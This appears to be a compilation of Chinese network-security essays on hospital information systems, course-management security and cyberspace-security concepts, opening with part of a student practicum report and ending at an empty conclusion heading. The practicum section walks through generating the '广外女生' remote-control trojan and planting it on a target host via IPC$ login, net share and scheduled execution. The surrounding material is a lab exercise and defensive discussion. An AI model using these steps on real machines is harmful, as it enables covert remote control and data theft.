A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

医院信息系统网络信息安全研究 篇6

关键词:医院信息系统;安全;数据;网络

中图分类号:TP309 文献标识码:A文章编号:1007-9599 (2011) 07-0000-01

Hospital Information System Network Information Safety Research

Qin Yisi

(Zhanjiang Center People's Hospital,Zhanjiang524037,China)

Abstract:With the deepening of information technology,hospital information system applications are increasingly widespread.Hospitals for all sorts of information networking,sharing,also brought a degree of security for the test.This paper analyzes the characteristics of hospital information system,its data security and confidentiality of information were of technical and management.

Keywords:Hospital information system;Safety;Data;Net

医院信息系统是一个复杂庞大的计算机网络系统,其以医院的局域网为基础依托、以患者为信息采集对象、以财务管理为运转中心,对医院就诊的所有患者进行全面覆盖。医院信息系统包括了医患信息和医院管理等各种信息,对信息的网络安全进行保护,保证其信息的完整性和可靠性,是医院信息系统正常运转的根本条件。因此有必要对医院信息系统的网络数据进行安全管理,避免各种自然和人为因素导致的安全问题,保证整个系统的安全有效。

一、医院信息系统特点分析

医院信息系统的网络结构决定着系统功能性及有效性。系统的各种集散数据、通信和所提供的系统的扩充能力、自我维护、信息服务等都很大程度上依赖与医院信息计算机系统的网络结构。星形拓扑结构有利于信息的集中控制,能避免局部或个体客端机故障影响整个系统的正常工作,因此可以采用以星形拓扑为基础的分层复合型结构的信息系统进行医院数据的全面管理。其次,作为医院信息系统的主要数据管理模式和管理工具,医院的数据库系统是保证医院信息系统完整性和安全性的关键。

一般认为网络安全就是针对黑客、病毒等攻击进行的防御,而实际上对于医院的信息系统而言,网络安全还受到其他很多因素的威胁,比如:网络设计缺陷、用户非法进入、通讯设备损坏等。网络出现故障将造成患者重要信息损坏和财务管理数据丢失,导致医院的正常作业不能开展。因此本文从技术和管理两个层面对医院信息系统的网络安全维护进行了探讨。

二、医院信息系统网络安全的技术实现

网络、应用、数据库和用户这四个方面是建立医院信息系统安全体系的主要组成部分,只有保证了这些结构的安全,才能从基本上实现医院信息系统的网络安全。

首先是确保网络的安全。医院网络安全包括医院内部网络安全和内外网络连接安全,防火墙、通讯安全技术和网络管理工具等是最常用的技术。其次是确保应用系统的安全。计算机的应用系统完整性主要包括数据库系统和硬件、软件的安全防护。可以采用风险评估、病毒防范、安全审计和入侵检测等安全技术对系统的完整性进行保护。其中,网络安全事件的80%是来自于病毒,因此病毒防范是保证系统完整性的主要措施。然后是确保数据库的安全。对处于安全状态的数据库,可以采用预防性技术措施进行防范;对于已发生损坏的数据库,可以采用服务器集群、双机热备、数据转储及磁盘容错等技术进行数据恢复。最后是确保用户账号的安全。采用用户分组、用户认证及唯一识别等技术对医院信息系统的用户账号进行保护。

三、医院信息系统网络安全的管理体系

除了在技术上对医院信息系统的网络安全进行确保,还需要建立完善合理的安全管理体系,更高层次的保证医院所有有用数据的安全。

(一)进行网络的信息管理。作为现代化医院的重要资产,且具有一定的特殊性,医院的所有信息都有必要根据实际情况,对不同类型的信息因地制宜的制定各种合理的管理制度,分类管理,全面统筹。(二)进行网络的系统安全管理。随时关注网络上发布的系统补丁相关信息,及时完善医院信息系统,对需要升级的系统进行更新,通过确保系统的安全达到保护整个医院信息管理安全的目的。(三)进行网络的行为管理。由专门的网络管理人员利用网络管理软件对医院信息系统内的各种操作和网络行为进行实时监控,制定网络行为规范,约束蓄意危害网络安全的行为。(四)进行身份认证与授权管理。通过规定实现身份认证与权限核查,对医院信息系统的用户身份和操作的合法性进行检查验证,从而区分不同用户以及不同级别用户特征,授权进入信息系统。(五)进行网络的风险管理。通过安全风险评估技术,定期研究信息系统存在的缺陷漏洞和面临的威胁风险,对潜在的危害进行及时的预防和补救。(六)进行网络的安全边界管理。现代化医院的信息交流包括其内部信息和内外联系两部分。与外界的联系主要是通过Internet进行,而Internet由于其传播性和共享性,给医院的信息系统带来较大的安全隐患。(七)进行桌面系统安全管理。桌面系统作为用户访问系统的直接入口,用户能够直接接触的资源和信息一般都存放其上,因此对其进行安全管理非常重要。用户可以采用超级兔子魔法设置或Windows优化大师等应用软件对无关操作和非法行为进行限制。(八)进行链路安全管理。针对链路层下层协议的攻击一般是通过破坏链路通信而窃取系统传输的数据信息。因此要对这些破坏和攻击进行防御,医院可以通过加密算法对数据处理过程实施加密,并联合采用数字签名和认证仪器确保医院信息数据的安全。(九)进行病毒防治管理。网络技术和信息技术的不断发展,也滋长了各种病毒的出现。病毒是计算机系统最大的安全隐患,对系统信息的安全造成很大的威胁。(十)进行数据库安全管理。对数据库的安全管理应该配备专人专机,对不同的数据库类型采取不同的使用方式和广利制度,保护医院信息系统的核心安全。(十一)进行灾难恢复与备份管理。百密总有一疏,任何安全防护体系都不肯能完全对病毒进行防杀,因此为了避免数据的损坏和事故的发生,需要制定相应的数据恢复措施,对重要数据进行定期备份。

四、结束语

当今信息化的不断发展给医院的管理和高效运转带来了方便,但同时也带来了挑战。为了维护病人医患信息和医院财务信息,需要从技术和管理上加强对网络的安全工作,需要与时俱进,不断采用新技术,引进新方法,适应社会需求,将医院的信息化建设推向更高平台。

参考文献

[1]尚邦治.医院信息系统安全问题[J].医疗设备信息,2004,9

[2]从卫春.浅谈医院信息系统安全稳定运行[J].医疗装备,2009,15

[3]任忠敏.医院信息系统安全体系的建立[J].医学信息,2004,13

[4]黄慧勇.医院信息系统安全按风险与应对[J].医学信息,2009,15

《网络信息安全》课程 篇7

1 Internet自身的缺陷及来自外界的网络安全问题

Internet本身非常脆弱,各类信息共享的同时,存在着不法分子盗窃其中的机密文件、盗取企业的重要数据等问题。造成这种现象的原因有很多,其中包括政府的管理措施及管理力度太薄弱,使得企业单位、家庭及个人的重要信息保密性差,网络安全得不到保障;网络本身的保密措施差,容易被人利用窃取敏感信息;Internet传递信息时利用的TCP/IP协议数据流所采用的明码传输办法,因无法控制传输过程,在传输时不能保证是否能在不被他人发现的情况下,把信息准确无误的传输到对方手中。

1.1 来自内部的网络安全威胁

来自网络内部的威胁分为三种:其一,安全意识匮乏的在网络内部工作的人员有可能泄露他人的信息,他们这种活动是无意识的,与此对应的是有目的的出卖他人信息,凭借自己的合法身份,进行信息买卖,不管是否有意,这种泄露信息的行为都是非法的;其二,从事网络安全管理工作的部分工作人员,并未经过严格的训练,由于各种问题而造成网络安全出现漏洞时,不懂得使用正确的方法进行处理;其三,由于断电、电源不稳定或硬件设备出现故障,而偶然的、无意的造成的一些安全威胁。

1.2 来自外部的网络安全威胁

来自网络外部的威胁大概可分为以下五种:1)网络病毒;2)一些人在网上对有害信息,例如黄色网页、反动思想、计算机病毒等进行制作、传播,或者利用网络对其他人进行恐吓威胁以骗取钱财;3)并未经计算机的拥有人授权,就私自使用计算机自行操作;4)在数据传输过程中,由于距离远或是接收方是第三方的缘故,造成信息在传输过程中被截取或破坏;5)计算机周围的不良环境对计算机造成的威胁。

1.3 计算机软件的漏洞

计算机软件的漏洞包括两方面。一方面是计算机本身的操作系统存在安全问题。例如打开计算机后,非本人操作也能轻易登录并获取信息;不能解决网络病毒、系统漏洞对操作系统的威胁;访问网站时会有非法的黄色网页或其他不良信息出现等等。另一方面自行研发的软件系统不能保障安全问题。例如用ansys、C语言等软件编写执行的程序不严谨,在传输过程中会被修改或盗取;系统软件可以随意登录,不用进行身份验证而造成安全危害。

2 针对信息系统安全出现的问题所采取的措施

现如今,网络安全问题日益严重,尤其高校单位常用的信息系统常常面临着病毒、黑客等的威胁,为了私密信息的安全,建立一套完善的信息系统防御体系势在必行。专业人士应该利用自己所学的知识,制定一套集技术、管理、规章等各个方面的因素于一体的防范措施,为解决安全问题献计献策。下文主要从四个方面介绍如何保证信息系统的安全。

2.1 思想方面

全面提高网民的网络安全意识,不给非法分子任何可乘之机。目前很多网络安全问题,大都是由计算机使用人员安全意识匮乏造成的,可以开展一些基本的网络安全课堂,解决安全意识薄弱,安全知识匮乏等问题。只有保护网络安全人人有责的意识深入人心,减少内部人员对计算机工作系统的破坏,才能从根本上解决此类问题。

2.2 技术方面

2.2.1 使用高性能的防火墙

防火墙是网络内部与网络外部之间的一道保护墙,可以对任何企图非法进入网路内部的不良信息进行监控,从而达到有效预防的目的,是防御黑客入侵的有效方法之一。而且,不管是以硬件还是软件为基础的防火墙,都能够达到我们期望的防护目的,对可疑网络活动识别、记录并拦截。这样就能把内网部分与混乱的外网部分割开来,成为拦截外部入侵的一道难以跨越的防线。例如可以更改从网络内部流到网络外部的数据流,对外部屏蔽单位、家庭及个人的私密信息。当前,防火墙技术已经更新到第三代,可以检测网络状态。这类防火墙可以通过检查IP包来判定是否允许接收外部信息。可以通过截获来自外部的数据包得到相关的信息,信息显示允许通过,外部信息就可以进入,信息显示不允许,外部信息就会被拒绝。这种状态检测防火墙比之前的代理防火墙、包过滤防火墙速度更快、性能更高、并且更加能够保障用户的安全,是当前最受欢迎,应用最广的防火墙。

2.2.2 运用虚拟网络技术

相对于防御外来攻击的防火墙,网络内部安全的保障需要使用虚拟网络技术。虚拟网络技术是将网络根据安全级别跟不同的应用业务分段,以此来达到进行不同段的访问限制,可以阻止非法人员的进入。

2.2.3 采用实时入侵检测技术

运用防火墙并不能解决所有的安全问题,还需要其他的防御手段进行网络安全保护。例如它不能完成对计算机内的每个文件都进行扫描,容易出现差错;不能保证接收的文件是安全无病毒,并且是恰恰满足自己需要的文件等等。所以需要采用入侵检测技术,作为防火墙的补充,弥补防火墙的缺陷。根据网络安全专家对处理安全问题的经验形成一系列的检测防御方法,建立自动反攻击措施。其次入侵检测技术还能在不断实践中积累经验,不断完善防护系统。同时,入侵检测技术还可以运用人工神经网络,对信息进行智能处理,充分发挥动态安全技术的优势。

2.2.4 反病毒

首先制定详尽的反对病毒入侵的措施,设置多重防御障碍,尽量使计算机网络运行中的每个环节都能反病毒的入侵。然后,设置反病毒软件在一定时间内进行自我更新,对盗版软件坚持打击不放过,鼓励人们使用正版杀毒软件对电脑上的文件定期扫描检测,并在工作中常用的软件设置访问权限及身份识别,以免重要信息泄露。

2.3 加强管理力度,保障网络安全

在增强人们安全防范意识地同时,健全相应的制度,进行严格的网络安全管理势在必行。信息系统安全管理越来越复杂,面临的问题也千奇百样,建立一套完整的网络安全管理政策,就可以在使用技术防御威胁的同时,使用管理手段对网络安全问题、计算机周围的环境进行统一处理。

2.4 完善信息系统,保障信息安全

2.4.1 设置严格的用户权限

以防非法用户及部门盗取用户信息,常用一些办法对用户的信息进行核实,区分用户及他们进行的操作是否合法。常用如下办法:1)身份识别。身份识别是安全系统防入侵的重要手段之一,是合法用户及非法用户的重要区分办法。主要通过指纹、问题回答、数字密码等方式来实现。用户也可以根据自身的不同需要,采取不同的安全技术措施来实现安全认证;2)限定用户使用权限。只有合法的用法才能使用查询、检索的功能,对计算机中的信息进行操作;3)用户权限内的数据信息才能被用户查询使用,否则会遇到无法显示及使用的提示。

2.4.2 常用数据信息进行自动备份

计算机中的数据,除了是用户的私人信息外,还可能跟企业单位的利益有关联。所以系统是否能够定期对计算机中的数据进行备份十分关键。对数据文件、系统软件,甚至整个网络系统的备份,可以在计算机遭受破坏时,方便还原信息,不至于造成太大的损失。在这个过程中,最好使用专业的备份软件,能够通过提高备份的速度,在最短的时间内恢复数据文件,将损失降到最低。

3 关于课程管理方面的网络安全的相关要求与标准

完善的内网安全管理系统应该能实现以下目标:1)对终端设备实施强制网络接入控制,能够充分阻止各种内网攻击,例如防止黑客攻击、木马攻击、外网间谍软件攻击或者蠕虫病毒爆发、非法探测扫描等攻击企图与行为;2)充分提高内网资源的使用效率,远程策略管理、资产管理控制、防止内网资源的滥用行为,限制应用软件如BT、P2P、即时通讯软件等的滥用;3)防止内网学生信息等重要信息的泄露,限制非法内外互联的行为,采取实时监控的方式控制各种网络连接行为,一旦发现即马上阻断可疑上网行为以达到保护内网资源的目的。

另一方面,为了达到安全管理的最终目标,任何的内网安全管理产品应具备桌面安全防护、行为管理监控等功能。同时,为了保证系统的可靠性、可用性、可扩展性,除了满足上述功能外,内网安全管理系统还应该具备以下特征:安全策略制定灵活、管理方便;支持大规模、分布式集中部署;系统可靠稳定、占用系统资源少;易于扩展,支持与其他安全管理产品联动。

4 总结语

网络迅速发展极大地促进了社会的发展和经济的飞跃。随着人们对于互联网的依赖程度越来越深,正常的网络运行和信息服务是极为重要的,如果人们的工作学习环境一旦受到网络安全的威胁,其损失将是不可估量的。因此,我们对于相关基于互联网的课程管理信息系统的网络安全进行了深入探讨,分析了目前的网络安全形势以及网络威胁的主要原因,并提出了一系列的防范网络安全威胁的举措,希望为广大相关从业者提供一定的思路与启发,相信在我们的共同努力与维护下,不止我们的课程管理信息系统,甚至整个互联网大环境都能得到不断地完善与发展。

参考文献

[1]贾清水.基于WEB的学分制管理信息系统的设计与实现[D].北京工业大学,2006.

[2]叶晟.一个C/S与B/S模式相混合的多应用的网络教学管理系统的设计与实现[D].中山大学,2009.

[3]胡智锋.基于离散型Hopfield网络的计算机网络安全等级分类研究[J].现代电子技术,2015(21).

[4]王炜.高职院校学生公选课程管理系统BPM引擎研究与设计[J].网络安全技术与应用,2014(10).

《网络信息安全》课程 篇8

近几年,信息安全、网络安全、网络空间安全等词汇在电视新闻媒体中的出现频率明显增多,得到社会民众的普遍关注。但在多种媒体上,上述三种词汇的交叉出现在一定程度上混淆了人们对三者的认识,导致三个主体之间的逻辑界限不清晰,一定程度上影响正常的信息安全与网络安全建设。本文将以此为背景,对信息安全、网络安全、网络空间安全的相关问题进行简单分析。

1 信息安全、网络安全、网络空间安全概述

1.1 信息安全的概念与范围

“信息安全”这一概念最早出现在上世纪初期,但随着通信技术的发展,直到上世纪40 年代“信息安全”才开始得到各国的普遍重视,并不断的进行探索。在信息安全有关问题的研究中,美国学者对这一概念的研究始终处在世界领先地位,并率先根据信息安全的特征,将国家信息安全划分为:物理安全、安全结构和模式、应用于系统开发等共时刻模块,重点阐述了信息技术在不同范围内的应用与开发特点,明确指出了信息安全对国家经济、社会发展的影响,该理论已经得到多数学者的肯定。

从我国学者对信息安全问题的研究内容来看,结合我国的实际情况,信息安全在我国被赋予了新的内涵。学者将“信息安全”定义为:保证国家、机构、个人的信息空间不受到来自内部与外部的威胁、侵害与误导,保证国家、机构、个人的信息空间具有高度的独立性与隐私性。而从信息安全在我国的实践来看,我国已经在信息安全建设中取得一系列成就,包括出台信息安全法律、建立信息安全机构等,并在部分学校开设有关信息安全的课程,进一步深化了民众对信息安全的认识,说明我国在信息安全建设中取得了里程碑式的成绩。

1.2 网络安全概述

网络安全是社会关注的热点问题,在2014 年2 月,我国正式将网络安全上升到国家战略层面,成立了以习近平总书记为核心的“中央网络安全与信息化领导小组”,体现出我国对网络安全建设的决心。同一时间,新加坡《联合早报》的部分学者引用部分学者的观点,认为网络安全涉及到政治安全、国防安全等诸多内容,并从非法律的角度讨论网络安全在国家正常运行中的作用,得到相关学者的普遍重视。

目前,网络安全实体内容正在不断演进。从我国发展经验来看,我国有关网络安全的法律关注点也在不断变化。例如,在最初的网络安全管理中,我国法律倾向于互联网网络数据安全,而在随后的发展中,逐渐发展为维持网络稳定运行状态,体现出我国在网络安全管理中工作重心的变化。但具体而言,网络安全的核心是系统安全,需要在保证系统平稳运行的基础上对各项子系统内容进行优化,并在此基础上实现网络信息安全、网络数据安全。这是网络安全的基本内容体系,是构建网络安全的起点与核心。

1.3 网络空间安全概述

“网络空间”这一词汇最早出现在上世纪80 年代,由一个科幻小说家提出,并迅速在世界范围内推广。当前普遍的观点认为,所谓网络空间就是基于全球计算机网络化的机械、信息源、人之间相互联系而形成的一种新型社会生活与信息交流空间,具有开放性、虚拟性、变动性、随时性等特点。

当前对网络空间安全的研究主要是从物理域、信息域等方面进行研究的。其中物理域的网络空间安全要求在硬件设施上进行安全保护,保证与网络空间安全相关的硬件设施不会遭到破坏;信息域的网络空间安全主要指网络信息安全,要保证整个网络信息数据的完整性、可用性、真实性与保密性,任何导致信息泄露、丢失的要素都可能成为威胁网络空间安全的风险(如“棱镜事件”等)。刘密霞等在有关网络空间安全的研究中,结合著名的“棱镜事件”,分析了我国在网络空间安全管理中存在的问题,并概括为:网络空间安全缺乏顶层设计、信息产品过多依赖进口、信息安全专业教育脱节等几个具体问题,这是相关人员在未来工作中要重视的问题。

1.4 信息安全、网络安全、网络空间安全三者的异同点

从国内外权威会议、条约对信息安全、网络安全、网络空间安全的使用情况来看,三者始终存在交替使用、并行使用的情况。例如,在2003 年召开的联合国“信息社会世界峰会”上,率先使用了“网络信息安全”这一概念,并多处并行使用了“网络安全”与“信息安全”。而我国在2012 年颁布的《关于大力推进信息化发展和切实保障信息安全的若干意见》中,多次出现网络与信息安全的词汇,说明三者在某些领域存在明显的相同点。

1.4.1 信息安全是三者的核心

信息安全管理是三者的核心内容,可将其理解为保障国家、机构、个人的信息安全不受到内外因素的威胁,由此可见,三者都将信息安全作为核心,只是网络安全与网络空间安全的侧重点不同,导致三者在内容形式上也存在一定差异,但三者所要达成的目标是相一致的。

1.4.2 三者可以相互使用

从三者的应用内容来看,信息安全的应用范围最广,既包括了传统的信息系统安全,也包括了当前热门的网络信息安全,可以被认为是网络安全与网络空间安全的统称。网络安全也可以被称为信息安全或网络空间安全,但侧重点主要是互联网范围内的信息安全。网络空间安全强调信息安全的“空间性”,并集中体现在“网络社区”、网络媒介等多种具有立体性的信息安全上。

1.4.3 三者所涉及的内容与外延存在一定差异

信息安全是非传统安全领域的重要组成部分,更多的重视信息系统技术安全与物理安全,在此背景下,物联网、云计算、大数据等一大批新型信息技术被推广,这些技术与网络信息之间保持密切联系,并在长期发展中出现多种问题,最终发展为网络安全问题,如人们所熟知的网络水军、网络犯罪等,而这些都是“信息安全”一词所不具备的。另一方面,网络安全与网络空间安全形成了跨时空、多层次等数据交流,能更具代表性的阐述某些问题。例如,网络空间安全设计到网络安全的生态环境问题,会从军事、天气等多种方面进行深层次解读。

2 推动我国信息安全建设的几点措施

2.1 积极借鉴西方发达国家的先进经验

西方国家在有关信息安全建设的研究中不断取得新进展,并根据自身发展情况进行信息安全立法,并取得良好成果。因此对我国而言,在开展信息安全建设中可以积极借鉴西方国家的成功经验,来完善自身管理方法。

以欧盟为例,欧盟在信息安全管理中具有鲜明的一体化特点,在1992 年推出《信息安全框架决议》,陆续推出一系列信息安全管理制度,规定了欧共体在打击破坏网络信息安全行动的一致性。而在此基础上,英国成立“网络安全业务中心”,通过及时掌握本国网络安全情况,收集多种与信息安全相关的事件,及时推出应急预案,将潜在信息安全风险降到最低。而德国在信息安全研究中,通过了“德国网络安全战略”,成立基于全国的信息安全管理中心,旨在强化德国对信息技术安全的应对能力。

对我国政府而言,在开展信息安全建设中,要正确认识到新时期我国所面临的各种信息安全问题,及时推出相应的法案,保证各种信息安全风险都能得到及时解决。

2.2 提高信息产业自主创新能力

对政府而言,在管理中要积极发挥信息产业的主观能动性,鼓励信息产业加快自主创新,充分发挥经济主体在市场中的积极性和创造性,建立我国自己的信息安全技术体系。而另一方面,要为信息产业建立一个安全和规范的网络信息环境,需要信息产业提供坚定的物质和技术支持,为推动我国信息产业的升级奠定基础。

3 结束语

主要讨论了信息安全、网络安全、网络空间安全的相关问题,并对三者的的概念、范围等进行分析。总体而言,信息安全、网络安全、网络空间安全是关乎国家发展的重点内容,相关人员在工作中能立足于互联网时代的发展特征,联系实际、放眼于未来,为加深人们对信息安全、网络安全、网络空间安全认识奠定基础。

参考文献

[1]卢新德.构建信息安全保障新体系[M].北京:中国经济出版社,2007.

[2]上海社会科学院信息研究所.信息安全辞典[M].上海:上海辞书出版社,2013.

[3]http://en.wikipedia.org/wild/Cyberspace.

论网络信息安全的信息管理 篇9

计算机网络信息管理是指以信息技术为载体, 以信息服务为对象, 融入计算机网络信息分布、储存、利用、服务的全过程。可以说, 保证网络信息安全是促进信息管理的前提, 在计算机网络信息管理中占有举足轻重的地位。笔者结合自身工作实践, 在本文中阐述了网络信息安全管理的概念及分类, 分析了当前网络信息的安全问题, 提出了进一步加强信息管理的对策措施, 以期对网络信息安全管理有所借鉴帮助。

1 网络信息安全管理的概念及分类

1.1 基础运行信息

所谓基础运行信息, 是网络信息管理工作的基本对象, 也是整个计算机网络信息的基础。基础运行信息主要指计算机网络IP地址、域名以及自治系统号等三类。可以说, 不管什么类型的计算机网络信息实现多元发展, 都必须以基础运行信息为基础和前提。

1.2 服务器信息

所谓服务器信息, 是与服务器运行密切相关的信息, 全面服务于计算机网络信息服务供给的全过程, 是检验计算机服务器运行质量和效率的最关键因素。计算机服务器信息主要包括基本配置参数、负载均衡指标、访问指标等。

1.3 用户信息

所谓用户信息, 是计算机用户身份的证明。计算机用户信息主要包括:用户姓名、用户部门、用户职位及权责等相关资料数据。

1.4 网络信息资源

所谓网络信息资源, 是计算机在为用户提供网络信息服务过程中, 所产生的信息资源。由于计算机网络结构的特殊性, 网络信息资源呈现出分散式、非线性式的特点, 这句导致网络信息资源在传输过程中, 会存在较多的安全隐患, 有被不安全信息介入的危险, 这需要引起广大计算机用户的密切关注。

2 当前网络信息安全问题分析

实践证明, 计算机网络信息管理中主要存在以下两种安全问题, 一种是信息安全检测, 这种问题是针对网络信息管理的完整性而言的;一种是信息访问控制问题, 这种问题是针对网络信息管理认证性和保密性而言的。

2.1 信息安全监测

科学的进行信息安全监测, 可以有效消除计算机网络的脆弱性, 在很大程度上提高网络信息资源的开放程度, 同时, 可以使计算机信息管理人员在第一时间发现计算机信息安全存在的隐患问题, 及时查清问题原因, 预警处理被攻击对象, 保证计算机网络信息系统中的关键程序、关键数据不被侵染, 确保网络信息的安全可靠。

2.2 信息访问控制问题

信息访问控制问题, 是计算机网络信息管理的核心所在。对于计算机网络信息资源的使用, 要严格信息控制访问要求, 使信息通信过程更加严密。也就是说, 计算机网络信息安全防护重点就是资源信息的发布过程和个人信息的储存过程。只有牢牢控制信息访问渠道, 才能从根本上保障计算机网络信息安全。

3 进一步加强信息管理的对策措施

3.1 强化思想认识, 健全完善制度

相关人员要进一步提升对计算机网络信息管理工作重要性的认识, 强化责任感和紧迫感。要根据所在单位的特点, 全面健全完善计算机信息管理制度, 切实规范如计算机应用管理、保密信息管理等工作。要建立网络安全应急预案, 为规范管理、确保安全夯实基础。同时, 要真正明确工作责任, 严格按照保密规定, 规范信息录入及发布流程, 及时消除信息管理安全隐患。要进行有针对性的教育培训, 及时组织开展计算机操作系统、网络知识、病毒防护等基本技能培训, 努力使计算机网络信息安全观念深入人心。

3.2 合理配置资源, 切实加强防范

一是要加强计算机病毒防护。要在中心服务器部上安装防毒、杀毒软件, 对内网、外网的客户端进行严格区分, 做好相关重要数据的备份工作。同时, 定期进行病毒扫描, 对于通过网络传输、邮件传输及移动介质接收的文件, 都可能携带病毒, 接收前要进行严格的扫描、查杀。二是要加强应急管理。要健全应急管理机制, 对出现的涉及网络信息安全的突发事件, 及时上报、处理, 查实原因、追究责任, 确保事件发生后把损失降到最低。三是要加强隔离管理。对内网、外网要通过物理方式或防火墙进行有效隔离, 保证防护外来攻击, 防止内、外网串联。

3.3 强化等级保护, 保障信息安全

要强化等级保护, 严格技术标准, 保障业务信息系统的安全。单位要成立专门的信息中心, 具体负责等级保护工作。信息安全基础设施要科学可靠, 强化信息系统运维管理, 有效提高系统的安全防护水平。同时, 要建立完善安全保护技术措施, 对网络、系统进行安全区域划分, 按照“水平分区、区内细分”的划分原则, 保证网络合理规划。要进一步加强制度建设和信息安全管理。严格本着“预防为主、建章立制, 加强管理、重在治本”的原则, 坚持管理与技术并重, 对信息安全工作的有效开展。起到了良好的规范作用。

3.4 落实专业措施, 确保安全运行

由于部分政府、高校、国企等计算机网络信息资源庞大, 所以可以采用专业性的解决方案来保护网络信息安全, 诸如: 运用网络门户网站保护解决方案, 从网络层、应用层到Web层, 对计算机网络信息进行全面防护。同时, 一些单位作为公共信息的提供者, 其网页经常被篡改、挂马, 这都大大影响了单位声誉。要使用防火墙、IDS/ IPS等, 具体来讲, 可以使用防火墙技术、代理服务器技术、入侵检测技术IDS、反病毒技术、认证技术、对信息进行加密等手段, 防止网页篡改、挂马。

4 总结

